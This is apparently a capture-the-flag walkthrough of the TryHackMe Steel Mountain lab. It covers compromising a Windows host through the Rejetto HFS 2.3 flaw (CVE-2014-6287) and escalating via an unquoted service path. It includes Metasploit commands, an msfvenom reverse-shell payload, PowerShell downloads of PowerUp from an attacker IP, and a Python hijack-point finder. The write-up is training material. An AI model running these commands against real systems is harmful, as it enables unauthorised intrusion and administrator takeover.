【THM】Steel Mountain-Practice

Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.

Initial Access

nmap -p- -sC -sV -T4 10.10.153.112

PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: STEELMOUNTAIN
|   NetBIOS_Domain_Name: STEELMOUNTAIN
|   NetBIOS_Computer_Name: STEELMOUNTAIN
|   DNS_Domain_Name: steelmountain
|   DNS_Computer_Name: steelmountain
|   Product_Version: 6.3.9600
|_  System_Time: 2024-01-11T14:43:54+00:00
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2024-01-10T14:05:59
|_Not valid after:  2024-07-11T14:05:59
|_ssl-date: 2024-01-11T14:43:59+00:00; -1s from scanner time.
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49169/tcp open  msrpc              Microsoft Windows RPC
49170/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-01-11T14:43:53
|_  start_date: 2024-01-11T14:05:48
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:2f:d5:76:10:39 (unknown)
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Three things stand out: the RDP banner's Product_Version 6.3.9600 is Windows Server 2012 R2 (the "2008 R2 - 2012" range from SMB is only nmap's fingerprint guess), SMB signing is not required, and port 8080 is running HttpFileServer (HFS) 2.3, a Rejetto version with a well-known remote command execution bug.

HFS 2.3 on port 8080 is the foothold. Rejetto HFS 2.3 is vulnerable to remote command execution (CVE-2014-6287), and the public exploit for it is on exploit-db:

https://www.exploit-db.com/exploits/39161

Locally this is the script 39161.py.

image-20240111225631351

image-20240111225944229

The way this exploit works, we have to host netcat on an HTTP server and run a netcat listener to catch the reverse shell. Before running 39161.py, edit the ip_addr and local_port variables near the top of the script to your attacking IP and the port your listener will use; the script fetches nc.exe from port 80 on that IP, so nc.exe has to be served from there. I copied nc.exe into a directory on the desktop, started my netcat listener in another terminal, then ran python -m http.server 80 in that directory to serve nc.exe to the target.

image-20240111232952303

image-20240111233134823

Privilege Escalation

Now that we have an initial shell on this Windows machine as Bill, we can enumerate the machine further and escalate our privileges to Administrator.

To enumerate the machine we use a PowerShell script called PowerUp, whose purpose is to assess a Windows machine and flag anything abnormal. In its own words, "PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations."

First, the Metasploit route to the initial shell (this replaces the manual 39161.py exploit above; note the target IP differs from the earlier scan):

msf6 > search cve-2014-6287
msf6 > use exploit/windows/http/rejetto_hfs_exec
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.65.105
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.11.63.201
msf6 exploit(windows/http/rejetto_hfs_exec) > run

Alternatively:

image-20240112145554866

PS> wget "http://10.11.63.201:80/PowerUp.ps1" -outfile "PowerUp.ps1"
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks

image-20240112145535778

CanRestart is True, which lets us restart the service ourselves, and the service's directory is writable. That means we can put our own executable where the service looks for its binary, restart the service, and it will run our program with the service's privileges.

image-20240112145719559

Use msfvenom to generate the reverse shell as a Windows service executable. The exe-service format matters: the service control manager expects the binary it starts to behave as a service, and a plain exe payload would be killed shortly after launch.

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.63.201 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

Background the meterpreter session and start a handler for the new payload:

meterpreter > background
msf6 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > exploit -j
msf6 exploit(multi/handler) > sessions    # list sessions and note the meterpreter session number

Then upload Advanced.exe into "C:\Program Files (x86)\IObit":

meterpreter > cd C:/
meterpreter > cd "Program Files (x86)"
meterpreter > cd IObit
meterpreter > upload Advanced.exe
[*] Uploading  : /root/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /root/Advanced.exe -> Advanced.exe
[*] Completed  : /root/Advanced.exe -> Advanced.exe

With the exe in the "IObit" folder, type shell in meterpreter, stop the service (sc stop AdvancedSystemCareService9) and start it again (sc start AdvancedSystemCareService9). The service binary lives under C:\Program Files (x86)\IObit\Advanced SystemCare\ and its path is unquoted, so the service control manager tries C:\Program Files (x86)\IObit\Advanced.exe before the real executable; our Advanced.exe runs with the service's privileges and the handler on 4443 catches the shell. Copying Advanced.exe into the "Advanced SystemCare" sub-folder as well adds nothing; the copy in IObit\ is the one that gets executed. See the figures below.

image-20240112151254601

image-20240112151342375

Access and Escalation Without Metasploit

Now let's complete the room without using Metasploit.

For this we use PowerShell and winPEAS to enumerate the system and gather the information needed to escalate to

Download PowerUp.ps1 onto the target from the attacker's web server:

powershell -c wget "http://10.11.63.201:80/PowerUp.ps1" -outfile "PowerUp.ps1"

image-20240112000538748

Then run it:

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

image-20240112002136783

Several services with unquoted paths show up, but that alone does not mean we have permission to write into them. This is where accesschk.exe comes in handy.

accesschk.exe reveals that 'bill' has write access to "C:\Program Files (x86)\IObit\". Because the service path is unquoted, the next location the service control manager checks for AdvancedSystemCareService9's executable is inside that directory (Advanced.exe, from the "Advanced SystemCare" part of the path), so placing our own file there, such as a reverse shell, tricks the service into running it.
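To show why Advanced.exe in the IObit directory is the file the service ends up running, and why an unquoted path alone (the accesschk point above, and the PowerUp finding earlier) is not enough, here is an added example of my own; it is not PowerUp, accesschk or IObit code. It takes a constructed `wmic service get Name,PathName,StartMode` table and a constructed set of directories that accesschk reported writable for bill, then computes the file names Windows tries before the real binary and which of them a low-privileged user could create. Only the AdvancedSystemCareService9 row is modelled on this box; the other rows are made up to show the non-exploitable cases.

```python
"""
Why Advanced.exe in C:\\Program Files (x86)\\IObit\\ is what the service runs.

When a service's ImagePath is unquoted and contains spaces, CreateProcess
tries each space-delimited prefix (with .exe appended) before the full path.
Whichever of those locations we can write to is the hijack point.
Both inputs below are constructed for the example.
"""
import ntpath
from dataclasses import dataclass

# Constructed sample of `wmic service get Name,PathName,StartMode` output.
WMIC_OUTPUT = """\
Name                        PathName                                                            StartMode
AdvancedSystemCareService9  C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\ASCService.exe    Auto
ExampleAgent                C:\\Program Files\\Example Vendor\\Agent Service\\agent.exe             Auto
WinDefend                   "C:\\Program Files\\Windows Defender\\MsMpEng.exe"                     Auto
Spooler                     C:\\Windows\\System32\\spoolsv.exe                                    Auto
"""

# Constructed: directories accesschk (-uwdq) reported writable for user bill.
WRITABLE_DIRS = {r"C:\Program Files (x86)\IObit", r"C:\Users\Public"}


@dataclass
class Service:
    name: str
    path: str
    start_mode: str


def parse_wmic(text: str) -> list:
    """Parse the wmic table; PathName may contain spaces, Name/StartMode cannot."""
    services = []
    for line in text.splitlines()[1:]:          # skip the header row
        if not line.strip():
            continue
        name, rest = line.split(None, 1)
        path, start_mode = rest.rsplit(None, 1)
        services.append(Service(name, path.strip(), start_mode))
    return services


def is_unquoted_with_spaces(path: str) -> bool:
    """Only unquoted paths containing a space are ambiguous to CreateProcess."""
    return not path.startswith('"') and " " in path


def hijack_candidates(path: str) -> list:
    """File names tried, in order, before the real executable.

    For C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\ASCService.exe these
    are C:\\Program.exe, C:\\Program Files.exe and
    C:\\Program Files (x86)\\IObit\\Advanced.exe.
    """
    parts = path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    return candidates


def exploitable(services, writable_dirs) -> list:
    """(service name, candidate path) pairs whose directory we can write to."""
    writable = {d.lower().rstrip("\\") for d in writable_dirs}   # NTFS is case-insensitive
    hits = []
    for svc in services:
        if not is_unquoted_with_spaces(svc.path):
            continue
        for cand in hijack_candidates(svc.path):
            if ntpath.dirname(cand).lower().rstrip("\\") in writable:
                hits.append((svc.name, cand))
    return hits


if __name__ == "__main__":
    for name, cand in exploitable(parse_wmic(WMIC_OUTPUT), WRITABLE_DIRS):
        print(f"{name}: drop a service exe at {cand}")
```

ExampleAgent is unquoted too, but every prefix it yields lands in C:\ or C:\Program Files, which bill cannot write to, so it is correctly not reported; that is the distinction the accesschk step makes. On a live host, replace the two constants with the real `wmic service get Name,PathName,StartMode` output and the directories accesschk shows as writable.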

FINALLY

What powershell -c command can we run to find the service name manually?

powershell -c Get-Service